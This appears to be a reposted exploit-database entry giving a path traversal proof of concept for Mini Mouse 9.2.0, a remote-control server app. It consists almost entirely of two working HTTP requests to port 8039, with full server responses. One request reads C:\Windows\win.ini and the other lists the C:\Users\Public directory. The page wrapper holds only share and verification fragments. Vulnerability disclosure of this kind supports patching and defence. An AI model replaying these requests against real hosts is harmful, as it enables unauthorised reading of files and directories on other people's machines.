扫码分享
验证:
体验盒子# Exploit Title: Mini Mouse 9.2.0 - Path Traversal
# Author: gosh
# Date: 02-04-2021
# Vendor Homepage: http://yodinfo.com
# Software Link: https://imgv.oss-cn-hangzhou.aliyuncs.com/minimouse.msi
# Version: 9.2.0
# Tested on: Windows 10 Pro build 19042.662
POC
GET /file=C:%5CWindows%5Cwin.ini HTTP/1.1
Host: 192.168.1.111:8039
Content-Type: application/json
Connection: keep-alive
Accept: */*
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Content-Length: 0
Accept-Encoding: gzip, deflate
{}
.......................................................
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/octet-stream
Content-Range: bytes 0-0/92
Content-Length : 92
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
second POC:
POST /op=get_file_list HTTP/1.1
Host: 192.168.1.111:8039
Content-Type: application/json
Connection: keep-alive
Accept: */*
User-Agent: MiniMouse/9.3.0 (iPhone; iOS 14.4.2; Scale/2.00)
Accept-Language: en-TN;q=1, ar-TN;q=0.9, fr-TN;q=0.8
Content-Length: 28
Accept-Encoding: gzip, deflate
{"path":"C:\\Users\\Public"}
.............................................................
HTTP/1.1 200 OK
Server: bruce_wy/1.0.0
Access-Control-Allow-Methods: POST,GET,TRACE,OPTIONS
Access-Control-Allow-Headers: Content-Type,Origin,Accept
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
P3P: CP=CAO PSA OUR
Content-Type: application/json
Content-Range: bytes 0-0/-1
{
"ret_code": 1,
"ret_msg": "success",
"data": {
"list": [{
"path": "C:\\Users\\Public\\AccountPictures",
"is_hide": true,
"is_floder": true,
"name": "AccountPictures",
"name_display": "AccountPictures",
"file_size": 0,
"create_time": 1615677,
"update_time": 1615737,
"sys_type": 2
}, {
"path": "C:\\Users\\Public\\Desktop",
"is_hide": true,
"is_floder": true,
"name": "Desktop",
"name_display": "Desktop",
"file_size": 0,
"create_time": 1575713,
"update_time": 1617276,
"sys_type": 2
}, {
"path": "C:\\Users\\Public\\desktop.ini",
"is_hide": true,
"is_floder": false,
"name": "desktop.ini",
"name_display": "desktop",
"file_size": 174,
"create_time": 1575713,
"update_time": 1575713,
"sys_type": 2
}, {
"path": "C:\\Users\\Public\\Documents",
"is_hide": false,
"is_floder": true,
"name": "Documents",
"name_display": "Documents",
"file_size": 0,
"create_time": 1575713,
"update_time": 1575713,
"sys_type": 2
}, {
"path": "C:\\Users\\Public\\Downloads",
"is_hide": false,
"is_floder": true,
"name": "Downloads",
"name_display": "Downloads",
"file_size": 0,
"create_time": 1575713,
"update_time": 1575713,
"sys_type": 2
}, {
"path": "C:\\Users\\Public\\Libraries",
"is_hide": true,
"is_floder": true,
"name": "Libraries",
"name_display": "Libraries",
"file_size": 0,
"create_time": 1575713,
"update_time": 1575714,
"sys_type": 2
}, {
"path": "C:\\Users\\Public\\Music",
"is_hide": false,
"is_floder": true,
"name": "Music",
"name_display": "Music",
"file_size": 0,
"create_time": 1575713,
"update_time": 1575713,
"sys_type": 2
}, {
"path": "C:\\Users\\Public\\Pictures",
"is_hide": false,
"is_floder": true,
"name": "Pictures",
"name_display": "Pictures",
"file_size": 0,
"create_time": 1575713,
"update_time": 1575713,
"sys_type": 2
}, {
"path": "C:\\Users\\Public\\Videos",
"is_hide": false,
"is_floder": true,
"name": "Videos",
"name_display": "Videos",
"file_size": 0,
"create_time": 1575713,
"update_time": 1575713,
"sys_type": 2
}]
}
}
体验盒子
